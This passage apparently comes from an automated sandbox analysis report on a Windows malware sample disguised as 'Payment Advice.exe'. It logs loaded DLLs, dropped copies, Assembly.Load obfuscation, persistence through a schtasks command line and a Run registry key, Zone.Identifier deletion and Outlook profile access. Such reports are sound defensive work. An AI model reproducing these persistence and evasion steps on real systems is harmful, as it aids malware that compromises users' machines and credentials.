                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\Payment Advice.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msvcp140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: textshaping.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder; Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Payment Advice.exe; File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\Payment Advice.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: Payment Advice.exe; Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Payment Advice.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                    Data Obfuscation

                    Source: Payment Advice.exe, Form1.cs; .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: sFPEKzHsLkYZIz.exe.0.dr, Form1.cs; .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment Advice.exe.8ec0000.8.raw.unpack, SQL.cs; .Net Code: System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment Advice.exe.4aeed50.4.raw.unpack, g45rfxMhkEpawBNuWE.cs; .Net Code: wPfj1ZW3Ew System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.Payment Advice.exe.b470000.9.raw.unpack, g45rfxMhkEpawBNuWE.cs; .Net Code: wPfj1ZW3Ew System.Reflection.Assembly.Load(byte[])
                    Source: Payment Advice.exe; Static PE information: section name: .text entropy: 7.9742405595701085
                    Source: sFPEKzHsLkYZIz.exe.0.dr; Static PE information: section name: .text entropy: 7.9742405595701085
                    Source: C:\Users\user\Desktop\Payment Advice.exe; File created: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe (dropped file)
                    Source: C:\Users\user\Desktop\Payment Advice.exe; File created: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe (dropped file)

                    Boot Survival

                    Source: C:\Users\user\Desktop\Payment Advice.exe; Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\sFPEKzHsLkYZIz" /XML "C:\Users\user\AppData\Local\Temp\tmp6619.tmp"
                    Source: C:\Users\user\Desktop\Payment Advice.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BjTxJte

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Payment Advice.exe; File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe; File opened: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier read attributes | delete
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\Payment Advice.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Payment Advice.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\sFPEKzHsLkYZIz.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe; Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Payment Advice.exe; Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
